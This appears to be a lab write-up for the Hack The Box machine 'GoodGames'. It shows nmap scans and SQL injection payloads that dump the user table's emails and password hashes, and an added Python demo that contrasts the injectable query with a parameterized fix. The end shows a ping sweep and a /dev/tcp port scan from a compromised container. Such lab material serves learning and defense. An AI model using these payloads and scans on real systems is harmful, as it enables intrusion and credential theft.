┌──(mikannse㉿kali)-[~/HTB/goodgames]
└─$ sudo nmap --min-rate=10000 -p- 10.10.11.130
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-03 23:30 CST
Nmap scan report for 10.10.11.130
Host is up (0.074s latency).
Not shown: 65534 closed tcp ports (reset)
PORT   STATE SERVICE
80/tcp open  http
Nmap done: 1 IP address (1 host up) scanned in 8.51 seconds
┌──(mikannse㉿kali)-[~/HTB/goodgames]
└─$ sudo nmap -sT -sV -sC -O -p80 10.10.11.130
[sudo] password for mikannse:
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-03 23:36 CST
Nmap scan report for 10.10.11.130
Host is up (0.066s latency).

PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.51
|_http-server-header: Werkzeug/2.0.2 Python/3.9.2
|_http-title: GoodGames | Community and Store
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 5.4 (95%), Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (95%), Linux 5.0 (94%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%), Linux 4.15 - 5.8 (93%), Adtran 424RG FTTH gateway (93%), Linux 3.10 (93%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: goodgames.htb

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.92 seconds
┌──(mikannse㉿kali)-[~/HTB/goodgames]
└─$ sudo nmap --script=vuln -p80 10.10.11.130
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-03 23:37 CST
Nmap scan report for 10.10.11.130
Host is up (0.069s latency).

PORT   STATE SERVICE
80/tcp open  http
| http-csrf:
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=10.10.11.130
|   Found the following possible CSRF vulnerabilities:
|
|     Path: http://10.10.11.130:80/
|     Form id:
|     Form action: #
|
|     Path: http://10.10.11.130:80/
|     Form id:
|     Form action: /login
|
|     Path: http://10.10.11.130:80/forgot-password
|     Form id:
|     Form action: /login
|
|     Path: http://10.10.11.130:80/blog
|     Form id:
|     Form action: #
|
|     Path: http://10.10.11.130:80/blog
|     Form id:
|     Form action: /login
|
|     Path: http://10.10.11.130:80/blog/1
|     Form id:
|     Form action: /login
|
|     Path: http://10.10.11.130:80/store-product.html
|     Form id:
|     Form action: #
|
|     Path: http://10.10.11.130:80/store-product.html
|     Form id:
|     Form action: #
|
|     Path: http://10.10.11.130:80/coming-soon
|     Form id:
|     Form action: //nkdev.us11.list-manage.com/subscribe/post?u=d433160c0c43dcf8ecd52402f&id=7eafafe8f0
|
|     Path: http://10.10.11.130:80/coming-soon
|     Form id:
|     Form action: #
|
|     Path: http://10.10.11.130:80/coming-soon
|     Form id:
|     Form action: #
|
|     Path: http://10.10.11.130:80/login
|     Form id:
|     Form action: #
|
|     Path: http://10.10.11.130:80/login
|     Form id:
|     Form action: #
|
|     Path: http://10.10.11.130:80/
|     Form id:
|     Form action: #
|
|     Path: http://10.10.11.130:80/
|     Form id:
|     Form action: /login
|
|     Path: http://10.10.11.130:80/signup
|     Form id:
|     Form action: /signup
|
|     Path: http://10.10.11.130:80/signup
|     Form id:
|     Form action: /login
|
|     Path: http://10.10.11.130:80/signup
|     Form id:
|     Form action: /login
|
|     Path: http://10.10.11.130:80/index.html
|     Form id:
|     Form action: #
|
|     Path: http://10.10.11.130:80/index.html
|     Form id:
|     Form action: #
|
|     Path: http://10.10.11.130:80/blog-article.html
|     Form id:
|     Form action: #
|
|     Path: http://10.10.11.130:80/blog-article.html
|     Form id:
|     Form action: #
|
|     Path: http://10.10.11.130:80/blog/store-product.html
|     Form id:
|     Form action: #
|
|     Path: http://10.10.11.130:80/blog/store-product.html
|     Form id:
|     Form action: #
|
|     Path: http://10.10.11.130:80/blog/index.html
|     Form id:
|     Form action: #
|
|     Path: http://10.10.11.130:80/blog/index.html
|     Form id:
|_    Form action: #
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
| http-phpmyadmin-dir-traversal:
|   VULNERABLE:
|   phpMyAdmin grab_globals.lib.php subform Parameter Traversal Local File Inclusion
|     State: UNKNOWN (unable to test)
|     IDs:  CVE:CVE-2005-3299
|       PHP file inclusion vulnerability in grab_globals.lib.php in phpMyAdmin 2.6.4 and 2.6.4-pl1 allows remote attackers to include local files via the $__redirect parameter, possibly involving the subform array.
|
|     Disclosure date: 2005-10-nil
|     Extra information:
|       ../../../../../etc/passwd :
|   <!DOCTYPE html>

Nmap done: 1 IP address (1 host up) scanned in 88.23 seconds
email=admin'union select 1,2,3,group_concat(column_name) FROM information_schema.columns WHERE table_schema =database() AND table_name = 'user'-- -&password=1111
The user table has four columns: email, id, name, password.
Final payload:
email=admin'union select 1,2,3,group_concat(email,0x3a,id,0x3a,name,0x3a,password) FROM user-- -&password=1111
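As an added illustration (not code from the box or from this writeup), the concatenated login query that this UNION payload exploits, beside its parameterized fix, run against an in-memory SQLite table with constructed rows; the payload is adapted to SQLite's `||` concatenation because multi-argument group_concat and the 0x3a literal are MySQL syntax.

```python
import sqlite3

# Constructed sample rows standing in for the `user` table enumerated above
# (columns email, id, name, password); hashes are placeholders, not real data.
ROWS = [
    (1, "admin@goodgames.htb", "admin", "hash-placeholder-1"),
    (2, "user@goodgames.htb", "user", "hash-placeholder-2"),
]


def make_db():
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE user (id INTEGER, email TEXT, name TEXT, password TEXT)")
    con.executemany("INSERT INTO user VALUES (?, ?, ?, ?)", ROWS)
    return con


def login_vulnerable(con, email, password):
    # String formatting: a quote in `email` closes the literal, and the
    # UNION appends a row of attacker-chosen columns to the result set.
    sql = (f"SELECT id, email, name, password FROM user "
           f"WHERE email = '{email}' AND password = '{password}'")
    return con.execute(sql).fetchall()


def login_safe(con, email, password):
    # Parameter binding: the driver passes values separately from the SQL
    # text, so the same input is compared as data and never parsed as SQL.
    sql = "SELECT id, email, name, password FROM user WHERE email = ? AND password = ?"
    return con.execute(sql, (email, password)).fetchall()


# The writeup's final payload, rewritten for SQLite (':' instead of 0x3a,
# || instead of MySQL's per-row multi-argument group_concat).
PAYLOAD = ("admin' UNION SELECT 1,2,3,"
           "group_concat(email||':'||id||':'||name||':'||password) FROM user-- -")


def demo():
    con = make_db()
    leaked = login_vulnerable(con, PAYLOAD, "1111")  # one row: 1,2,3,<whole table>
    safe = login_safe(con, PAYLOAD, "1111")          # no row matches that email
    return leaked, safe


if __name__ == "__main__":
    leaked, safe = demo()
    print("vulnerable:", leaked)
    print("parameterized:", safe)
```

The vulnerable call returns a single row whose fourth column is the whole table joined with ':' and ',', exactly what the payload dumps on the box; the parameterized call returns nothing.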
root@3a453ab39d3d:/tmp# for i in {1..254}; do (ping -c 1 172.19.0.${i} | grep "bytes from" | grep -v "Unreachable" &); done;
64 bytes from 172.19.0.1: icmp_seq=1 ttl=64 time=0.038 ms
64 bytes from 172.19.0.2: icmp_seq=1 ttl=64 time=0.037 ms
root@3a453ab39d3d:/tmp# for port in {1..65535}; do echo > /dev/tcp/172.19.0.1/$port && echo "$port open"; done 2>/dev/null
22 open
80 open